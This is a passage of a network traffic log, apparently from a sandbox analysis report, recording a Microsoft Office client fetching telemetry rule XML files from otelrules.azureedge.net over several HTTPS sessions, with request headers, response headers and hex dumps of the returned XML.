2024-11-07 03:13:16 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:16 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:16 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:16 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031316Z-16547b76f7fvllnfhC1DFWxkg800000007q00000000022r1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:16 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:16 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:16 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:16 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: bd36c54f-701e-0032-55b1-30a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031316Z-17df447cdb5fh5hghC1DFWam0400000000z0000000003vg4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:16 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:17 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:17 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 527b7663-001e-00ad-545f-2e554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031317Z-17df447cdb5fzdpxhC1DFWdd3400000003ug000000005tnz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:17 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:17 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:17 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 48d17247-501e-00a0-2f4d-2e9d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031317Z-15869dbbcc6j87jfhC1DFWky3s00000008qg000000005yb7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:17 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:17 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:17 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 36c217ee-101e-008e-63b5-2fcf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031317Z-15869dbbcc6pfq2ghC1DFWmp1400000000v0000000004ty2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:17 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:17 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:17 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: bcab188a-c01e-0014-325f-2ea6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031317Z-17df447cdb5g2j9ghC1DFWev0800000003hg00000000hf86 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:17 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:17 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:17 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 52750d0d-001e-00ad-1b5c-2e554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031317Z-17df447cdb5rrj6shC1DFW6qg400000003qg000000007m54 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:17 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:18 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:18 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:18 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 9eee1406-f01e-0020-6e5f-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031318Z-15869dbbcc6xcpf8hC1DFWxtx000000008a0000000008enr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:18 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:18 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:18 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:18 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031318Z-16547b76f7fxdzxghC1DFWmf7n00000007ng00000000dymd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:18 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:18 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:18 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:18 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 0a7a2f72-a01e-0002-3b58-2e5074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031318Z-15869dbbcc6khw88hC1DFWbb200000000170000000000geb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:18 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:18 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:18 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:18 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: e0f9c939-d01e-0049-47d2-2ce7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031318Z-16547b76f7fvllnfhC1DFWxkg800000007g000000000s093 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:18 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49877	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
